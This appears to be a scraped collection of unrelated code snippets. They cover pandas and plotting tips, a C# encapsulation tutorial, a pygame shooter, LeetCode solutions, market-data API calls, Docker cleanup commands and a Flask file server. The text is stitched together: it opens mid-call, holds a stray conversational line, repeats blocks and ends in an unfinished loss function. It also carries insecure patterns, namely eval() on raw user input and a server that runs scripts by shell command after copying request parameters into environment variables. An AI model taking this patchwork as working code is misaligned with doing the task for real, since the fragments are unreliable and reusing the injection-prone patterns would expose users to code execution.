	main("captcha.png")
# Connect to Wharton Research Data Services and pull the daily Dow Jones index.
# NOTE(review): requires WRDS credentials; Connection() prompts interactively.
import wrds
db = wrds.Connection(wrds_username='joe')
db.raw_sql('SELECT date,dji FROM djones.djdaily')
// ENCAPSULATION TUTORIAL — three progressively refined versions of Dog.
// This variable is not encapsulated.
// Therefore it's missing some context: what is it naming?
string name;

// BASIC ENCAPSULATION
// These variables and methods are encapsulated in the Dog class, so
// they make more sense now. They are members of the Dog class.
class Dog {
    string name;
    int age;

    void Bark() {
        Console.WriteLine("Bark!");
    }

    void Rename(string newName) {
        name = newName;
    }
}

// ACCESS MODIFIERS
// The members above have context, but they are accessible by any other
// code. To define access, use access modifiers:
// - public: Member is accessible by any other code in the same assembly
//    or another assembly that references it.
// - private: Member is accessible only by code in the same class or
//    struct.
// - protected: Member is accessible only by code in the same class or
//    any class that is derived from that class.
// - internal: Member is accessible only by code within the same assembly.
// - protected internal: Member is accessible only to code within the
//    same assembly or by any class that is derived from that class.
class Dog {
    private string name;
    private int age;

    public void Bark() {
        Console.WriteLine("Bark!");
    }

    public void Rename(string newName) {
        name = newName;
    }

    public string GetName() {
        return name;
    }

    public void SetAge(int newAge) {
        if(newAge > 0)
            age = newAge;
    }

    public int GetAge() {
        return age;
    }
}

// PROPERTIES
// Now the variables are private and only accessible through the public
// methods. This is great because we can control how the private variables
// are accessed and modified, but this class seems bulky for only really
// having 2 variables and 1 unique method. Properties allow us to slim
// it down while still enforcing rules...
// NOTE(review): Name { get; set; } is an auto-property with its own
// compiler-generated backing field — the private `name` field below is
// left unused; confirm that is intended in the example.
class Dog {
    private string name;
    private int age;

    public string Name { get; set; }

    public int Age {
        get { return age; }
        set {
            if( value > 0)
                age = value;
        }
    }

    public void Bark() {
        Console.WriteLine("Bark!");
    }
}
import random
import pygame

# ========== Pygame Config ================

# Window dimensions in pixels.
WIDTH = 400
HEIGHT = 400
screen_size = [WIDTH, HEIGHT]

# Define the colors we will use in RGB format
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)

# Initialize the game engine
pygame.init()

# Set the height and width of the screen
screen = pygame.display.set_mode(screen_size)
pygame.display.set_caption("Ball invaders")


# ========== Functions ===================


def p5_map(n, start1, stop1, start2, stop2):
    """Linearly remap *n* from the range [start1, stop1] onto
    [start2, stop2] (equivalent of Processing/p5.js map())."""
    fraction = (n - start1) / (stop1 - start1)
    return fraction * (stop2 - start2) + start2


# ========== Classes =====================


class Vector:
    """A 2-D displacement; unary ~ yields the opposite direction."""

    def __init__(self, x, y):
        self.x, self.y = x, y

    def __invert__(self):
        # ~v mirrors the vector through the origin.
        return Vector(-self.x, -self.y)


class Position:
    """A mutable 2-D point on the play field."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def coordinates(self):
        """Return (x, y) as a tuple."""
        return self.x, self.y

    def is_clear(self, game_):
        """True if no snake segment occupies exactly this position.

        NOTE(review): references game_.snake, which the Game class in this
        file never defines — this looks copied from a snake game; confirm.
        """
        for pos in game_.snake.positions:
            # BUG FIX: the original compared the bound method `pos.coordinates`
            # (no call) against a tuple, which is never equal, so is_clear
            # always returned True.
            if pos.coordinates() == self.coordinates():
                return False
        return True

    def update(self, vector):
        """Translate in place by vector.x / vector.y."""
        self.x += vector.x
        self.y += vector.y

    def __eq__(self, other):
        # Fuzzy equality: within game.object_padding on both axes
        # (reads the module-level `game` instance).
        return abs(self.x - other.x) < game.object_padding and abs(self.y - other.y) < game.object_padding


# Base movement step in pixels per tick; the four unit directions below.
VECTOR_SIZE = 5

RIGHT = Vector(VECTOR_SIZE, 0)
LEFT = Vector(-VECTOR_SIZE, 0)
UP = Vector(0, -VECTOR_SIZE)
DOWN = Vector(0, VECTOR_SIZE)


# ========== Game Objects ================


class Shot:
    """Base projectile: owns a reference to the game, a position, and a speed."""

    def __init__(self, game_, init_pos):
        self.game = game_
        # Copy the coordinates so the shot does not share the shooter's Position.
        self.position = Position(init_pos.x, init_pos.y)
        self.speed = 5

    def update(self):
        # The base shot does not move; subclasses override this.
        pass

    def encounters(self, other):
        """True when this shot collides with *other* (fuzzy Position equality)."""
        return self.position == other.position

    def show(self):
        # Default rendering: small blue circle.
        pygame.draw.circle(self.game.screen, BLUE, self.position.coordinates(), 5)


class FriendlyShot(Shot):
    """A shot fired by the player; travels straight up."""

    def __init__(self, game_, init_pos):
        super().__init__(game_, init_pos)

    def update(self):
        # Negative y: move up by `speed` pixels per tick.
        self.position.update(Vector(0, -self.speed))


class EnemyShot(Shot):
    """A shot fired by an enemy; travels straight down and renders red."""

    def __init__(self, game_, init_pos):
        super().__init__(game_, init_pos)

    def update(self):
        # Positive y: move down by `speed` pixels per tick.
        self.position.update(Vector(0, self.speed))

    def show(self):
        pygame.draw.circle(self.game.screen, RED, self.position.coordinates(), 5)


class Spaceship:
    """The player's ship, starting centered horizontally near the bottom edge."""

    def __init__(self, game_):
        self.game = game_
        self.position = Position(WIDTH / 2, HEIGHT - 20)

    def shoot(self):
        """Spawn an upward-moving shot at the ship's current position."""
        self.game.friendly_shots.append(FriendlyShot(self.game, self.position))

    def show(self):
        # Rendered as a black circle of radius 10.
        pygame.draw.circle(self.game.screen, BLACK, self.position.coordinates(), 10)


class Enemy:
    """An invader that jitters in a small up-left-down-right square and can
    fire EnemyShots at the player."""

    def __init__(self, game_, position_, vibration_rate=1):
        self.game = game_
        self.position = position_
        self.vibration_rate = vibration_rate
        # Repeating jitter pattern: up, left, down, right.
        self.vibration_pattern = ['U', 'L', 'D', 'R']
        self.vibration_counter = 0

    def vibrate(self):
        """Apply the next jitter step to the position and advance the pattern."""
        step = self.vibration_pattern[self.vibration_counter]
        if step == 'U':
            self.position.y -= self.vibration_rate
        elif step == 'L':
            self.position.x -= self.vibration_rate
        elif step == 'D':
            self.position.y += self.vibration_rate
        else:  # 'R' — the only remaining pattern entry
            self.position.x += self.vibration_rate
        # Wrap the index back to the pattern start.
        self.vibration_counter = (self.vibration_counter + 1) % len(self.vibration_pattern)

    def kill(self):
        """Remove this enemy from the game's roster."""
        self.game.enemies.remove(self)

    def shoot(self):
        """Fire a downward shot from the enemy's current position."""
        self.game.enemy_shots.append(EnemyShot(self.game, self.position))

    def show(self):
        # Jitter one step each frame, then draw as a green circle.
        self.vibrate()
        pygame.draw.circle(self.game.screen, GREEN, self.position.coordinates(), 10)


class Game:
    """Owns every game object plus the global collision padding."""

    def __init__(self, screen_, object_padding=10):
        self.screen = screen_
        self.ship = Spaceship(self)
        self.object_padding = object_padding
        self.friendly_shots = []
        self.enemy_shots = []
        self.enemies = []
        self.spawn_enemies()

    def spawn_enemies(self):
        """Place one enemy every 50 px along the top edge of the screen."""
        positions_ = [Position(x, 20) for x in range(20, WIDTH - 10, 50)]
        for pos in positions_:
            self.enemies.append(Enemy(self, pos))

    def enemies_shoot(self):
        """Give one random enemy a 10% chance to fire this tick.

        BUG FIX: guard against an empty roster — random.choice([]) raises
        IndexError, which crashed the game once every enemy was destroyed.
        """
        shooting_chance = 0.1
        if self.enemies and random.random() < shooting_chance:
            random.choice(self.enemies).shoot()


if __name__ == '__main__':

    game = Game(screen)

    # Loop until the user clicks the close button.
    done = False
    clock = pygame.time.Clock()

    # Mainloop
    while not done:

        # This limits the while loop to a max of 50 frames per second.
        # Leave this out and we will use all CPU we can.
        clock.tick(50)

        # Continuous (held-key) horizontal movement, clamped at the edges.
        pressed_keys = pygame.key.get_pressed()
        if pressed_keys[pygame.K_RIGHT]:
            if not game.ship.position.x + RIGHT.x >= WIDTH:
                game.ship.position.update(RIGHT)
        elif pressed_keys[pygame.K_LEFT]:
            # NOTE(review): LEFT.x is negative, so `x - LEFT.x` ADDS the step;
            # the left-edge clamp likely intends `x + LEFT.x <= 0` — confirm.
            if not game.ship.position.x - LEFT.x <= 0:
                game.ship.position.update(LEFT)

        for event in pygame.event.get():  # User did something
            if event.type == pygame.QUIT:  # If user clicked close
                done = True  # Flag that we are done so we exit this loop
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    game.ship.shoot()

        # Clear the screen and set the screen background
        screen.fill(WHITE)

        # ===========> UPDATE POSITIONS HERE <========

        game.enemies_shoot()

        # NOTE(review): enemy.kill() mutates game.enemies while it is being
        # iterated, and `del enemy` / `del shot` only unbind the LOCAL names —
        # hit shots are never removed from game.friendly_shots, so they keep
        # updating and drawing every frame. Confirm and clean up.
        for shot in game.friendly_shots:
            shot.update()
            for enemy in game.enemies:
                if shot.encounters(enemy):
                    enemy.kill()
                    del enemy
                    del shot
                    break

        for shot in game.enemy_shots:
            shot.update()
            if shot.encounters(game.ship):
                exit(1)  # ship was hit: terminate with a non-zero status

        # ===========> START DRAWING HERE <===========

        game.ship.show()

        for shot in game.friendly_shots:
            shot.show()

        for shot in game.enemy_shots:
            shot.show()

        for enemy in game.enemies:
            enemy.show()

        # ===========> END DRAWING HERE <=============

        # Go ahead and update the screen with what we've drawn.
        # This MUST happen after all the other drawing commands.
        pygame.display.flip()
# Stream best bid/ask (bookTicker) for each symbol from Binance spot and
# futures over one multiplexed websocket each.
# NOTE(review): ThreadedWebsocketManager comes from python-binance and is
# imported elsewhere; the callbacks just print every message.
symbols = ['BTCUSDT', 'ETHUSDT']

twm = ThreadedWebsocketManager()
twm.start()

twm.start_multiplex_socket(callback=lambda msg: print('Spot:', msg), streams=[f'{s.lower()}@bookTicker' for s in symbols])
twm.start_futures_multiplex_socket(callback=lambda msg: print('Futures:', msg), streams=[f'{s.lower()}@bookTicker' for s in symbols])
<!-- Event-entry form: POSTs year/month/day/hour plus a description to /event.
     All fields are free-text inputs; validation happens server-side. -->
<form action='/event' method='post'>
Year ("yyyy"):  <input type='text' name='year' />
Month ("mm"):  <input type='text' name='month' />
Day ("dd"):  <input type='text' name='day' />
Hour ("hh"):  <input type='text' name='hour' />
Description:  <input type='text' name='info' />
             <input type='submit' name='submit' value='Submit'/>
</form>
>>> a = 1
>>> b = 2
>>> a, b = b, a
>>> a
2
>>> b
1
# Importing the AutoViz class
from autoviz.AutoViz_Class import AutoViz_Class
# Instantiate the AutoViz class
AV = AutoViz_Class()

# Run automatic visualisation on the CSV; df holds AutoViz's return value
# (presumably the loaded DataFrame — confirm against the autoviz docs).
df = AV.AutoViz('car_design.csv')
from collections import defaultdict, namedtuple, Counter, deque

# Top-6 most frequent words (``words`` is defined elsewhere — TODO confirm).
Counter(words).most_common(6)
challenges_done = [('mike', 10), ('julian', 7), ('bob', 5),
                   ('mike', 11), ('julian', 8), ('bob', 6)]

# Group the challenge counts by author name.
challenges = defaultdict(list)
for name, challenge in challenges_done:
    challenges[name].append(challenge)

challenges
User = namedtuple('User', 'name role sur')
user = User(name='bob', role='coder', sur='ellepola')
# NOTE(review): the two lines below duplicate the namedtuple example above.
User = namedtuple('User', 'name role sur')
user = User(name='bob', role='coder', sur='ellepola')
def clean(txt):
    """Strip HTML markup and residual entities from a pandas string Series.

    Parameters
    ----------
    txt : pandas.Series
        Series of raw text values (accessed via the ``.str`` accessor).

    Returns
    -------
    pandas.Series
        Cleaned copy of the series.
    """
    # Bug fix: pandas >= 2.0 treats str.replace patterns as literal text by
    # default, so regex=True is required for these patterns to match.
    txt = txt.str.replace(r"<br/>", "", regex=True)
    txt = txt.str.replace(r"(<a).*(>).*(</a>)", "", regex=True)
    txt = txt.str.replace(r"&amp", "", regex=True)
    txt = txt.str.replace(r"&gt", "", regex=True)
    txt = txt.str.replace(r"&lt", "", regex=True)
    # \xa0 is a non-breaking space left over from HTML extraction.
    txt = txt.str.replace("\xa0", " ", regex=True)
    return txt
df['xxx column'] = clean(df['xxx column'])
# Download the helper library from https://www.twilio.com/docs/python/install
import os
from twilio.rest import Client


# Find your Account SID and Auth Token at twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)

message = client.messages.create(
                              from_='+15017122661',
                              body='body',
                              to='+15558675310'
                          )

print(message.sid)
from pathlib import Path
p = Path(r'../data/property_files/final_source_matching_file').glob('**/*')
files = [x for x in p if x.is_file()]
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 500)
def addNums(a, b):
    """Return the sum of *a* and *b*."""
    return a + b
class Solution:
    def addDigits(self, num: int) -> int:
        """Return the digital root of *num* using the mod-9 shortcut."""
        if num == 0:
            return 0
        remainder = num % 9
        return 9 if remainder == 0 else remainder

#----------------------------------------

class Solution:
    def addDigits(self, num: int) -> int:
        """Return the digital root of *num* in O(1) via the closed form."""
        return 0 if num == 0 else 1 + (num - 1) % 9
  
        
class Solution:
    def minDeletionSize(self, strs: List[str]) -> int:
        """Count the columns of *strs* that are not sorted top-to-bottom.

        Each string in *strs* has equal length; a column must be deleted
        when reading it downwards is not non-decreasing.
        """
        # zip(*strs) yields each column as a tuple; sorted() gives the
        # non-decreasing reference.  The original built two identical
        # per-column lists element by element with index loops.
        return sum(
            1 for column in zip(*strs) if list(column) != sorted(column)
        )


#" using unzip "

class Solution:
    def minDeletionSize(self, A: List[str]) -> int:
        """Return how many columns of *A* are not in sorted order."""
        # Booleans sum as 0/1, so this counts the unsorted columns.
        return sum(list(col) != sorted(col) for col in zip(*A))
        
I was not in a mood to do this, so try again.
new_list = sorted(a_list, key=lambda x: (len(x), x))
mask=np.triu(np.ones_like(corr,dtype=bool))

f ,ax = plt.subplots(figsize=(11,9))
cmap=sns.diverging_palette(230,20, as_cmap=True)
sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
           square=True, linewidth=.5, cbar_kws={'shrink':.5})
# Solution with a temporary variable

a = input("Enter variable a: ")
b = input("Enter variable b: ")

print(f"Variable a is {a}: ")
print(f"Variable b is {b}: ")

c = a
a = b
b = c

print(f"Variable a is now {a}: ")
print(f"Variable b is now {b}: ")
public class Main {
  int x = 5;

  public static void main(String[] args) {
    Main myObj = new Main();
    System.out.println(myObj.x);
  }
}
class Person:
  def __init__(self, name, age):
    self.name = name
    self.age = age

p1 = Person("John", 36)

print(p1.name)
print(p1.age)
for p in ax.patches:
    values= '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 11)
for p in ax.patches:
    values= '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 11)
import warnings
warnings.filterwarnings('ignore')
def indec_query(query_name='IPC_Nacional', url='https://apis.datos.gob.ar/series/api/series?ids=145.3_INGNACNAL_DICI_M_15'):

    """Download a time series from Argentina's datos.gob.ar API and dump it to CSV.

    By default this retrieves the national CPI (IPC Nivel General Nacional)
    as a monthly variation series.

    Parameters
    ----------
    query_name : str, optional
        Label used both as the value column name and in the output file
        name ('dataset_<query_name>', written without a .csv extension).
    url : str, optional
        Series API query URL; build one with
        https://datosgobar.github.io/series-tiempo-ar-call-generator/

    Notes
    -----
    Relies on module-level ``requests``, ``json`` and ``pd`` (pandas)
    imports defined outside this snippet — TODO confirm.
    """

    r = requests.get(url=url)

    r_dict = json.loads(r.text)

    # The API returns rows as [date, value] pairs.
    df = pd.DataFrame(r_dict['data'])

    # Column 0 is the date, column 1 the series value.
    df.rename(columns={0: 'fecha',
                                                1:query_name},
                            inplace=True)

    df.to_csv('dataset_'+query_name, index=False)
def bcra_query(variable='dolar_blue', url='https://api.estadisticasbcra.com/usd'):
    """Download a series from api.estadisticasbcra.com and dump it to CSV.

    Parameters
    ----------
    variable : str, optional
        Column name for the values; also used in the output file name
        ('dataset_<variable>', written without a .csv extension).
    url : str, optional
        BCRA API endpoint to query.

    Notes
    -----
    Relies on module-level ``requests``, ``json``, ``pd`` (pandas) and a
    ``bearer`` token string defined outside this snippet — TODO confirm.
    """
    # The API authenticates with a bearer token.
    r = requests.get(url=url,
                     headers={'Authorization': 'BEARER ' + bearer})
    r_dict = json.loads(r.text)

    df = pd.DataFrame(r_dict)

    # API payload keys: 'd' holds the date, 'v' the value.
    df.rename(columns={'v': variable,
                       'd': 'fecha'},
              inplace=True)

    # NOTE(review): removed dead code — the original computed date.today()
    # and str(today) and discarded both results.
    df.to_csv('dataset_' + variable, index=False)
# Load the data
churn_df = pd.read_pickle("CHURN_1.p")
g = sns.*plot 
ax = g 
for p in ax.patches:
    ax.text(p.get_x() + p.get_width()/2., p.get_height(), '{0:.2f}'.format(p.get_height()), 
        fontsize=12, color='black', ha='center', va='bottom')
from operator import attrgetter

df['duration_dataset'] = (
    df['date_1'].dt.to_period('M') -
    df['date_2'].dt.to_period('M')).apply(attrgetter('n'))
    def create(self, validated_data):
        """Create a Snip from *validated_data* and return its serialized form.

        ``tags`` and ``language`` are popped out first because they are
        relations that must be attached after the Snip instance exists.

        NOTE(review): this returns serializer *data* (a dict), not the model
        instance — confirm callers expect that, since DRF's ``create`` hook
        conventionally returns the instance.
        """
        # print(validated_data)
        tags = validated_data.pop("tags")
        language = validated_data.pop("language")
        snip = Snip(**validated_data)
        # languageObj, created = Language.objects.get_or_create(**language)
        snip.language = language
        snip.save()  # must be saved before many-to-many tags can be added
        for tag in tags:
            # tagObj, created = Tag.objects.get_or_create(**tag)
            # print(tagObj)
            snip.tags.add(tag)
        return ShallowSnipSerializer(snip).data
import pandas as pd
from datetime import datetime

ps = pd.Series([datetime(2014, 1, 7), datetime(2014, 3, 13), datetime(2014, 6, 12)])
new = ps.apply(lambda dt: dt.replace(day=1))
import pandas as pd

data = {'name': ['Somu', 'Kiku', 'Amol', 'Lini'],
	'physics': [68, 74, 77, 78],
	'chemistry': [84, 56, 73, 69],
	'algebra': [78, 88, 82, 87]}

	
#create dataframe
df_marks = pd.DataFrame(data)
print('Original DataFrame\n------------------')
print(df_marks)

new_row = {'name':'Geo', 'physics':87, 'chemistry':92, 'algebra':97}
#append row to the dataframe
df_marks = df_marks.append(new_row, ignore_index=True)

print('\n\nNew row added to DataFrame\n--------------------------')
print(df_marks)
class Singleton(type):
    """Metaclass that caches exactly one instance per class.

    The first ``Cls()`` call builds the instance; every later call returns
    the same cached object.
    """

    _instances = {}

    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super(Singleton, cls).__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance

# Python 2: metaclasses are declared via the __metaclass__ class attribute.
class MyClass():
    __metaclass__= Singleton

# Python 3: the metaclass is passed as a keyword in the class header.
class MyClass(metaclass=Singleton):
     pass
da = da.assign_coords(year_month=da.time.dt.strftime("%Y-%m"))
result = da.groupby("year_month") - da.groupby("year_month").mean("time")
"""index.py
Usage:
  index.py serve <dir>
  index.py serve <dir> [--port=<port>]
  index.py info <dir>
  index.py (-h | --help)
  index.py --version
Options:
  -h --help     Show this screen.
  --version     Show version.
  --port=<port> Port to bind to [default: 8080].
"""
# -*- coding: utf-8 -*-

import os
import multiprocessing
import sys


import crayons
import delegator
from docopt import docopt
from flask import Flask, request, abort
from livereload import Server as ReloadServer
from whitenoise import WhiteNoise


def yield_files(dir, endswith):
    """Yield paths (relative to *dir*) of files whose names end with *endswith*.

    Directory trees whose relative root starts with a period are skipped.
    """
    for root, _subdirs, names in os.walk(dir):
        # Make the root relative to the starting directory.
        relative_root = root[len(dir) + 1:]

        # Skip hidden directory trees.
        if relative_root.startswith('.'):
            continue

        for name in names:
            if name.endswith(endswith):
                yield os.sep.join((relative_root, name))


def do_info():
    """Handle the CLI 'info' command (currently a no-op placeholder)."""
    return None


def convert_dir(dir):
    """Return the absolute path of *dir*, exiting when it is not a directory.

    Prints an error and terminates the process with status 1 when the path
    does not name an existing directory.
    """
    dir = os.path.abspath(dir)
    # Bug fix: an assert would be stripped under `python -O`; validate
    # explicitly so the check always runs.
    if not os.path.isdir(dir):
        print(crayons.red('The directory given must be a valid one!'))
        sys.exit(1)

    return dir

def convert_port(port):
    """Return *port* as an int, defaulting to 8080 when *port* is None.

    Exits with status 1 when *port* is neither None nor a valid number.
    """
    if port is None:
        # Bug fix: the original returned the *string* '8080' here while the
        # other branch returned an int, giving callers inconsistent types.
        return 8080
    try:
        return int(port)
    except ValueError:
        print(crayons.red('The port given must be a valid number!'))
        sys.exit(1)

def prepare_extras(request):
    """Flatten a Flask request's JSON/form/query parameters into (key, value) pairs."""
    extras = {}

    # Merge all parameter sources; later sources overwrite earlier keys.
    if request.json:
        extras.update(request.json)
    if request.form:
        extras.update(request.form)

    if request.args:
        extras.update(request.args)

    extra = []

    # NOTE(review): when a merged value is a plain string, this inner loop
    # iterates its *characters*, producing one pair per character — confirm
    # the values here are lists and not scalar strings.
    for key, values in extras.items():
        for value in values:
            extra.append((key, value))

    return extra

def find(endswith, dir, path):
    """Return the first path from yield_files(dir, endswith) containing
    ``path + endswith``, or None when nothing matches.
    """
    # Bug fix: the body used Python 2 ``print`` statements, which are
    # syntax errors on Python 3; the debug output was removed.
    target = '{0}{1}'.format(path, endswith)
    for fs_path in yield_files(dir, endswith):
        if target in fs_path:
            return fs_path
    return None

def directory_listing(path):
    """Return an HTML list of <li> links for the entries of *path*."""
    entries = os.listdir(path)
    return ''.join('<li><a href="{0}">{0}</a></li>'.format(entry) for entry in entries)

def do_serve(dir, port):
    """Runs the 'serve' command, from the CLI.

    Serves *dir* over HTTP on *port*: .py files are executed in a
    subprocess and their stdout returned, .html files are served verbatim,
    and unmatched directory paths fall back to a listing or a 404.
    """

    # Convert dir and port to appropriate values.
    dir = convert_dir(dir)
    port = convert_port(port)

    os.chdir(dir)

    app = Flask(__name__)

    @app.route('/', defaults={'path': './'})
    @app.route('/<path:path>')
    def catch_all(path):
        """Resolve *path* to index.html, index.py, or any .py file and serve it."""

        # Support for index.html.
        found = find('index.html', dir, path)

        # Support for index.py
        if not found:
            found = find('index.py', dir, path)

        # Support for directory listing.
        if not found:
            found = find('.py', dir, path)


        # A wild script was found!
        if found:
            if '.py' in found:
                # Expose request parameters to the script via its environment.
                extras = prepare_extras(request)

                for key, value in extras:
                    os.environ[key] = value

                c = delegator.run('python {0}'.format(found))

                # Clean the injected variables back out of the environment.
                for key, value in extras:
                    del os.environ[key]

                return c.out

            elif '.html' in found:
                # Strip prepending slashes.
                if found.startswith('/'):
                    found = found[1:]

                # Open the file, and spit out the contents.
                with open(found) as html:
                    return html.read()

        else:
            if os.path.isdir(path):
                return directory_listing(path)

            abort(404)


    @app.before_request
    def before_request():
        """Register dir's files with the static server before each request.

        NOTE(review): ``app`` is rebound to the WhiteNoise wrapper below, so
        by request time this closure calls WhiteNoise.add_files — confirm
        re-registering on every request is intended.
        """
        app.add_files(dir, prefix='/')

    @app.after_request
    def after_request(response):
        """Stamp every response with an X-Powered-By header."""
        response.headers['X-Powered-By'] = 'index.py by Kenneth Reitz'
        return response

    # Wrap the Flask app with WhiteNoise for static files, then serve it
    # through livereload, watching the whole tree for changes.
    app = WhiteNoise(app, root=dir)
    server = ReloadServer(app)
    server.watch('{0}/**'.format(dir))

    # Alert the user.
    print(crayons.yellow('Serving up \'{0}\' on port {1}.'.format(dir, port)))
    server.serve(port=port)


def main():
    """Parse the docopt CLI arguments and dispatch to the matching command."""
    args = docopt(__doc__, version='index.py, version 0.0.0')

    if args['info']:
        do_info()

    if args['serve']:
        do_serve(dir=args['<dir>'], port=args['--port'])


if __name__ == '__main__':
    main()
with open(filename) as f:
    mylist = f.read().splitlines() 
{<key_value>: <value> for <var> in <sequence> if <condition>}
# Sum the integers 1..100 with a while loop.
i = 1
s = 0
while i < 101:
    s += i
    i += 1
print(s)
# Fruit name -> count, in insertion order.
fruit = {
    "elderberries": 1,
    "figs": 1,
    "apples": 2,
    "durians": 3,
    "bananas": 5,
    "cherries": 8,
    "grapes": 13,
}

# One [name, count] row per fruit, preserving dict order.
table_data = [[name, count] for name, count in fruit.items()]
from random import randint
x = randint(1,10)
for Name in range (x):
    print('My Name is Hasan')
for x in range (1):
    from random import randint
    x = randint(1,51)
    print('One random number between 1 and 50: ', x)
for y in range (1):
    from random import randint
    y = randint(2,6)
    print('One random number between 2 and 5: ', y)
print("X power y is: ", x**y)
num1 = eval(input('Enter the first number: '))
num2 = eval(input('Enter the second number: '))
print('The average of the numbers you entered is', (num1+num2)/2)
students_period_A = ["Alex", "Briana", "Cheri", "Daniele"]
students_period_B = ["Dora", "Minerva", "Alexa", "Obie"]


# method 1, problematic
for students in students_period_A:
  students_period_B.append(students)
  print(students_period_B)

# method 2, more elegant
all_students = students_period_A + students_period_B
for student in all_students:
  print(student)

print(all_students)


# output 

['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri', 'Daniele']
Alex
Briana
Cheri
Daniele
Dora
Minerva
Alexa
Obie
Alex
Briana
Cheri
Daniele
['Alex', 'Briana', 'Cheri', 'Daniele', 'Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri', 'Daniele']
python_topics = ["variables", "control flow", "loops", "modules", "classes"]

#Your code below: 
length = len(python_topics)
index = 0
 
while index < length:
  print("I am learning about "+ python_topics[index])
  index += 1

# output 

I am learning about variables
I am learning about control flow
I am learning about loops
I am learning about modules
I am learning about classes
python_topics = ["variables", "control flow", "loops", "modules", "classes"]

#Your code below: 
length = len(python_topics)
index = 0
 
while index < length:
  print(python_topics[index])
  index += 1

# output 

variables
control flow
loops
modules
classes
with open('dict.csv', 'w') as csv_file:  
    writer = csv.writer(csv_file)
    for key, value in mydict.items():
       writer.writerow([key, value])
import tejapi
tejapi.ApiConfig.api_key = "your key"
TSMC = tejapi.get(
    'TWN/EWPRCD', 
    coid = '2330',
    mdate={'gte':'2020-06-01', 'lte':'2021-04-12'}, 
    opts={'columns': ['mdate','open_d','high_d','low_d','close_d', 'volume']}, 
    paginate=True
    )
UMC = tejapi.get(
    'TWN/EWPRCD', 
    coid = '2303',
    mdate={'gte':'2020-06-01', 'lte':'2021-04-12'},
    opts={'columns': ['mdate','open_d','high_d','low_d','close_d', 'volume']}, 
    paginate=True
    )
UMC = UMC.set_index('mdate')
TSMC = TSMC.set_index('mdate')
import ctypes
ctypes.windll.kernel32.SetThreadExecutionState(0x80000002)
ctypes.windll.kernel32.SetThreadExecutionState(0x80000000)
L = [8, 10, 6, 1]

for i in L:
    print(i)
promise = "I will finish the python loops module!"

for promises in range(5):
  print(promise)

# Output 

I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
def csReverseIntegerBits(n):
    """Return *n* with the order of its significant bits reversed."""
    reversed_bits = 0
    while n:
        # Shift the accumulator left and bring in the lowest bit of n.
        reversed_bits = (reversed_bits << 1) | (n & 1)
        n >>= 1
    return reversed_bits
class Node:
  """A binary-tree node holding a key plus parent/left/right links."""

  def __init__(self, value):
    self.key = value     # the key of the node
    self.parent = None   # the pointer to the parent node
    self.left = None     # the pointer to the left child node
    self.right = None    # the pointer to the right child node
mask = pd.to_numeric(df['Name'], errors='coerce').notnull()
df[mask] = df[mask].shift(axis=1)
print (df)
  Name  Val Rating
0  ABC  123    B +
1  DEF  234    B +
2  NaN  567     B-
3  GHI  890      D
percent_missing = df.isnull().sum() * 100 / len(df)
missing_value_df = pd.DataFrame({'column_name': df.columns,
                                 'percent_missing': percent_missing})
# Get unique elements in multiple columns i.e. Name & Age
uniqueValues = (empDfObj['Name'].append(empDfObj['Age'])).unique()

print('Unique elements in column "Name" & "Age" :')
print(uniqueValues)
import pandas as pd

# create a dataframe with one column
df = pd.DataFrame({"col1": ["a", "b", "a", "c", "a", "a", "a", "c"]})

# setting normalize=True
item_counts = df["col1"].value_counts(normalize=True)
print(item_counts)
PYTHONPATH=. poetry run pytest tests -W ignore::DeprecationWarning -W ignore::FutureWarning
>>> df2_transposed = df2.T # or df2.transpose()
>>> df2_transposed
              0     1
name      Alice   Bob
score       9.5   8.0
employed  False  True
kids          0     0
# check logs in the worker
docker logs worker --follow

# what to do when postgres No space left on device
 #Lister tous les containers 
 docker ps -a
 #Tous les down 
 docker stop id1 id2 id3 ...
 #Pruner les container 
 docker container prune
 #Pruner les image 
 docker image prune -a (modifié) 
 #Pruner les volume 
 docker volume prune
 #Supprimer les volumes non détectés automatiquement
 docker volume ls
 docker volume rm id1 id2 id3 ...
phonebook = {}
phonebook["John"] = 938477566
phonebook["Jack"] = 938377264
phonebook["Jill"] = 947662781
print(phonebook)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
flask shell # open python shell with app running
import torch
cross_entropy_loss = torch.nn.CrossEntropyLoss()

# Input: f_q (BxCxS) and sampled features from H(G_enc(x))
# Input: f_k (BxCxS) are sampled features from H(G_enc(G(x))
# Input: tau is the temperature used in PatchNCE loss.
# Output: PatchNCE loss
def PatchNCELoss(f_q, f_k, tau=0.07):
    # batch size, channel size, and number of sample locations
    B, C, S = f_q.shape

    # calculate v * v+: BxSx1
    l_pos = (f_k * f_q).sum(dim=1)[:, :, None]

    # calculate v * v-: BxSxS
    l_neg = torch.bmm(f_q.transpose(1, 2), f_k)

    # The diagonal entries are not negatives. Remove them.
    identity_matrix = torch.eye(S)[None, :, :]
    l_neg.masked_fill_(identity_matrix, -float('inf'))

    # calculate logits: (B)x(S)x(S+1)
    logits = torch.cat((l_pos, l_neg), dim=2) / tau

    # return PatchNCE loss
    predictions = logits.flatten(0, 1)
    targets = torch.zeros(B * S, dtype=torch.long)
